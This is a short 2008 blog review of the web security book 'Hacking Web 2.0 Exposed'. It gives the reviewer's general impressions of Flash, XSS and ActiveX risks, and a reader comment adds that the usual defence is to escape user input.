02/29/2008
Book review Hacking web2.0 exposed
2008 by Rich Cannings and Himanshu Dwivedi and Zane Lackey
Some remarks after clsosing down the book.
* I didn't know that Flash applications were that powerful and dangerous. And even more when you use them together with dns pinning.
* XSS just seems at the beginning of its road into the networks and the interactivity of websites. The possibilities seem endless.
* ActiveX needs to be secure or not allowed. Period.
The book gives a lot of code, it is nearly a manual for attackers. It gives also a lot of tips, but these seem a lot less ordened and structured. What I mean is a procedure of things you should have done and tested, a kind of checklist.
Another weakness of the book is that there is a lot of attention for the security firm of the writers and not too much at other initiatives, but I presume you also read other books and so this wouldn't influence you too much, won't it.
I wouldn't read it as a first introduction, but if you have already read some stuff about hacking web2.0 applications, than this should be your following book. And if you aren't convinced yet that you need an application firewall and a more static website without flash, activeX and the lot, than you throw this book at them.
I find it in fact a depressing book. Maybe we should send these books to all the hypers and investors of web2.0. to show them that the possibilities are unlimited.... for hackers.
16:49 | Permalink | Comments (1) | Email this
| 
| 
del.icio.us
|
| 
Digg | 
Facebook
Comments
Good review, pretty much right on. if you've read XSS attacks already it makes the book much more readable from a tech perspective. not sure about the book needing a checklist, seems like every book has a checklist. the majority of the countermeasures are the same for web1.0; dont trust user input and filter/escape all user input.
Posted by: CG | 03/01/2008
Respond to this commentPost a comment